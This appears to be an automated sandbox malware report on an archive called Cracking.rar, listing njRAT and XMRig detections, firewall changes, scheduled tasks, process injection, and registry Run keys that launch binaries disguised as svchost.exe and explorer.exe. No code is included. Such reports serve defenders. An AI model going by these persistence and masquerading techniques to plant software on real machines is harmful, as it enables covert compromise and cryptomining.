Analysis Overview
SHA256
88362564f1f82fd3b8d520c5aa4925f62781ef58d4c5493b3d98e5c1c71210fd
Threat Level: Known bad
The file Cracking.rar was found to be: Known bad.
Malicious Activity Summary
xmrig
njRAT/Bladabindi
XMRig Miner payload
Modifies Windows Firewall
Downloads MZ/PE file
Loads dropped DLL
Cryptocurrency Miner
Executes dropped EXE
Checks computer location settings
Obfuscated with Agile.Net obfuscator
Registers COM server for autorun
Modifies system executable filetype association
Drops desktop.ini file(s)
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in Windows directory
Drops file in Program Files directory
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Opens file in notepad (likely ransom note)
Modifies Internet Explorer Phishing Filter
Creates scheduled task(s)
Uses Volume Shadow Copy WMI provider
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Enumerates system info in registry
Uses Volume Shadow Copy service COM API
Suspicious use of SetWindowsHookEx
Checks processor information in registry
Modifies registry class
Uses Task Scheduler COM API
Modifies Internet Explorer settings
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious behavior: GetForegroundWindowSpam
Modifies data under HKEY_USERS
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2023-07-07 05:34
Signatures
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-07-07 05:34
Reported
2023-07-07 05:44
Platform
win10v2004-20230703-en
Max time kernel
576s
Max time network
580s
Command Line
Signatures
njRAT/Bladabindi
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\version.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\updates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\updates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\updates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\updates.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe | N/A |
Cryptocurrency Miner
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe | N/A |
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Program Files\WinRAR\uninstall.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Registers COM server for autorun
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" | C:\Program Files\WinRAR\uninstall.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" | C:\Program Files\WinRAR\uninstall.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Corporation Security = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\svchost.exe" | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Microsoft Explorer = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\explorer.exe" | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Windows\CurrentVersion\Run | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" | C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE | N/A |
| Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" | C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | C:\Users\Admin\Desktop\Cracking\TSP\TSP.EXE | N/A |
Checks installed software on the system
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2416 set thread context of 1316 | N/A | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\explorer.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 1632 set thread context of 2876 | N/A | C:\Users\Admin\AppData\Local\Temp\updates.exe | C:\Windows\explorer.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\WinRAR\RarExtInstaller.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Default64.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Zip64.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Default.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Uninstall.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\7zxa.dll | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarExt32.dll | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarFiles.lst | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Zip64.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\UnRAR.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExt.dll | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\rarnew.dat | C:\Program Files\WinRAR\uninstall.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Zip.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\WinRAR.chm | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\WinRAR.chm | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\zipnew.dat | C:\Program Files\WinRAR\uninstall.exe | N/A |
| File created | C:\Program Files\WinRAR\License.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\WinRAR.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\WinCon64.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\ReadMe.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Rar.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExtPackage.msix | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Default64.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Uninstall.lst | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Rar.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\UnRAR.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Uninstall.lst | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Uninstall.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\7zxa.dll | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Zip.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Descript.ion | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarExt.dll | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Resources.pri | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Rar.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExt32.dll | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\WinCon64.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Order.htm | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarFiles.lst | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Default.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\WinCon.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\__tmp_rar_sfx_access_check_240722140 | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\License.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Rar.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\Descript.ion | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\WhatsNew.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\RarExtPackage.msix | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\WhatsNew.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Order.htm | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\WinCon.SFX | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File created | C:\Program Files\WinRAR\Resources.pri | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\ReadMe.txt | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\RarExtInstaller.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
| File opened for modification | C:\Program Files\WinRAR\WinRAR.exe | C:\Users\Admin\Downloads\winrar-x64-622.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\assembly | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| File created | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
| File opened for modification | C:\Windows\assembly\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\Setup.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Desktop\Cracking\Dork Searcher Cr7\Dork Searcher Cr7 .exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Internet Explorer Phishing Filter
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\PhishingFilter | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 155e28e2e3add901 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\MINIE | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{754EFADE-F1FD-4617-9F39-90872F42B799}" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31043732" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "395473086" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\WinRAR\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\RepId | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31043732" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\WinRAR\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{09ED4A5F-1C88-11EE-A3FC-F6B35234CE3D} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3734306969" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\VersionManager | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "3734306969" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Program Files\WinRAR\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Main\DownloadWindowPlacement = 2c0000000000000000000000ffffffffffffffffffffffffffffffff100100003c000000900300001c020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3011986978-2180659500-3669311805-1000\Software\Microsoft\Internet Explorer\IESettingSync | C:\Program Files\WinRAR\WinRAR.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
